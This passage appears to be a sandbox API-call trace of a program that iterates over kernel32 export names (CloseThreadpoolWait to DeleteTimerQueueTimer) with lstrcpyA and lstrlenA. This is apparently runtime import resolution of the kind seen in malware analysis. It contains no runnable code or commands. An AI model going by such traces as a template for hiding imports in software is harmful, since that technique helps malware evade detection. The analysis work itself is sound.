lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.781] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.781] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.781] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.781] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.781] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.781] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.781] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.781] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.781] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.781] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.781] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.781] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.782] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.782] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.782] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.782] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.782] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.782] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.782] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.782] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.782] lstrlenA (lpString="COPYFILEA") returned 9 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.782] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.782] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.782] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.782] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.782] lstrlenA (lpString="COPYFILEW") returned 9 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.782] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.782] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.782] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.782] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.783] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.783] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.783] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.783] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.783] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.783] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.783] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.783] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.783] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.783] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.783] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.783] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.783] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.783] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.783] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.783] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.783] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.783] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.784] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.784] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.784] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.784] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.784] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.784] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.784] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.784] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.784] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.784] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.784] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.784] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.784] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.784] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.784] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.784] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.784] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.784] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.784] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.785] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.785] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.785] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.785] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.785] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.785] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.785] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.785] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.785] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.785] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.785] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.785] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.785] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.785] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.785] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.785] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.785] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.785] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.785] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.786] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.786] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.786] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.786] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.786] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.786] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.786] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.786] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.786] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.786] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.786] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.786] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.786] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.786] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.786] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.786] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.786] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.786] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.786] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.787] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.787] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.787] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.787] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.787] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.787] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.787] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.787] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.787] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.787] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.787] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.787] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.787] lstrlenA (lpString="DELETEATOM") returned 10 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.787] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.787] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.787] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.787] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.787] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.787] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.788] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.788] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.788] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.788] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.788] lstrlenA 